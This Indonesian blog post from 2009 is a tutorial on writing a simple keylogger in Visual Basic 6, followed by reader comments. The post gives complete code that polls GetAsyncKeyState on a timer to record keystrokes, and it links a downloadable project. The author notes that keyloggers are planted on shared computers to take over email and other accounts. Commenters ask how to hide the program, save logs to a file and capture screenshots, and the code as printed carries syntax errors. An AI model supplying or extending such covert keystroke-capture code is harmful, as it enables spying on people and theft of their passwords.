Membuat KeyLogger sederhana dengan VB 6

15 04 2009

Pernah dengar Keylogger ? Tentunya pernah bagi anda yang suka berkutat dengan dunia komputer dan internet. Karena penting bagi kita, untuk menjaga privasi (password dan akun) yang kita miliki dalam dunia maya. Karena bisa saja saat kita berselancar di dunia netting, dengan menggunakan komputer orang lain (warnet/teman) telah dipasang suatu alat lunak bernama Keylogger untuk mencatat aktifitas yang kita ketikan melalui keybord. Tuing…. Bisa saja akun email, blog,web, dll di ambil alih oleh orang yang memanfatkan Keylogger tersebut. Bagai mana she membuat keylogger, Key logger sesungguhnya biasanya di jadikan seperti virus agar tidak bisa terdeteksi keberadanya. Namun tujuan utamanya hanya satu, yaitu mencatat aktifitas key board. Kali ini kita akan membuat keylogger sederhana (fungsi utama), yang mampu mencatat aktifitas user yang dilakukan melalui tombol keyboard. Okay, dalam tutor ini kita memakai visual basic 6.0, bagi anda yang suka bercoding bahasa lain juga tidak masalah karena yang kita butuhkan disini hanyalah 1 fungsi API. Pembuatan Taruhlah 2 komponen pada form, yaitu Textbox dan Timer dengan properti sbb:

Timer (name:Timer1,interval:200)

Textbox(name:Text1,Multiline:True)

Lihat gambar berikut !

Lalu tuliskan codingnya di balik jendela code form !

Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer

Private Function GetKey() As String

Dim Num As Byte

For Num = 33 To 122

If GetAsyncKeyState(Num) <> 0 Then

GetKey = Chr(Num)

Exit For

End If

Next

End Function

Private Sub Timer1_Timer()

Text1.Text = Text1.Text & GetKey

End Sub

Penjelasan

GetAsyncKeyState, adalah fungsi API untuk mengecek apakah sedang ada tombol yang ditekan (dengan nilai ASC dalam parameternya). Maka jika ada tombol yang sedang di tekan (dengan nilai asc pada paramaternya – vKey) dia akan mengembalikan nilai bukan 0 (ndok), namun jika saat dia dipanggil tidak ada tombol yang ditekan maka dia mengembalikan nilai 0 (ndok)

Interval 200, pada timer menunjukan, proses pengecekan dilakukan 1/5 detik. Dengan kecepatan ini, terkadang Keylogger menangkap 1 tombol dengan 2 kali output. Namun ini lebih baik, dari pada kita memakai interval yang rendah, karena bisa saja ketikan tidak tertangkap dengan sempurna.

Textbox,kita pakai untuk menampung ketikan user.

OK kira – kira cukup sampai disini, bias dikembangkan sendiri.Silahkan jalankan maka program akan menangkap aktifitas tangan pada keyboard anda bukan pada celana anda lho.. Ha9x. :)

Download contoh projeknya !

KeyLog


Salam Maniz

HrXxX


Aksi

Information

19 responses

10 05 2009
Andro

Boss

kok pas yang masukiin coding form

“Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer” tulisannya merah ya??? “user32″nya merah tulisannya

10 05 2009
kav2008

Andro

Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer”

itu seharusnya dijadikan satu baris, :d. Cz editornya disini gak muat. Hi9x

see juga ya di
http://www.codenesia.com/

23 09 2009
HaiHaTa2|2

yang merah tuh gara2 salah mba mas tante om :D
salah :: Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Bener :: Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer
yg salah kalo di copas di VB jadi “user32? harusnya “user32″
maaf master, komentar dikit, Hehehehe…

23 09 2009
HaiHaTa2|2

Hahahaha… harusna [tanda petik2]user32[tandapetik2]
udah bener komentar diupload kok jadi gitu lagi

25 09 2009
hirin

HaiHaTa2|2 mkasih yah…. tambahan komentaranya

5 02 2010
Awam

mas..Kok “If GetAsyncKeyState(Num) 0 Then”

kok Error ya?
tanda 0

programnya yang salah apa sintaknya?
mohon pencerahannya…:)

5 02 2010
HrXxX

If GetAsyncKeyState(Num)=0 then

seharusnya ada “=” lalu setelah then apa syntaknya

saya udah pindah kesini codenesia.com

24 02 2010
Leo

Numpang nanya mas
– klo program aplikasinya gak dibuka apa masih jalan?
– biasanya klo keylogger kita buat program kita ga keliatan biar ga ketauan…. itu gimana?
– bisa juga simpan gambar ga?
– klo printscr gak jalan yah mas?

<<<<>>>>

24 02 2010
Leo

<<<<>>>>

25 02 2010
Hirin

Sayasudahpindah kesini, gabung aj
http://codenesia.com/

sharing ilmu yuk

5 07 2010
the prisoner

dari dulu gini2 aj keyloggernya. gimana kalo user menekan tanda seru (!), user menekan tombol shift + 1, tapi yang tampil hanya ascii dari shift saja. bagaimana dengan karakter yang perlu ditekan shift?

19 07 2010
Radityo

Mas, mau tanya, kenapa di VB saya Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer, Dikasih warning Statement is not valid in a namespace.

Private Function GetKey() As String dan
Private Sub Timer1_Timer()
juga dikasih warning seperti itu?ab

Pliss dijawab mas

20 07 2010
Hirin

Radityo : Tolong ke web baru aya aj, sya udah ninggalin web ini lama..
web baru saya adalah http://codenesia.com/

19 01 2011
ichwan

kk caranya buat gimna habis itu kan harus make project..
kog yng make project gk nyala tuh biar nyala gimna…….

26 01 2011
Hirin

Ke codenesia aj, saya sudah pindah web…

21 04 2011
zhanaz45

Kalo cara membuat dengan javascript ghimana..??

10 07 2011
Mau_belajar

gw coba kok gk nangkap aktivitas keyboard gw

5 10 2011
phynt

Kalo biar nyimpen file tersebut di file log, caranya gimana?

10 10 2011
kav2008

Gabung aja ke codenesia.com mas brooo

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s




Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: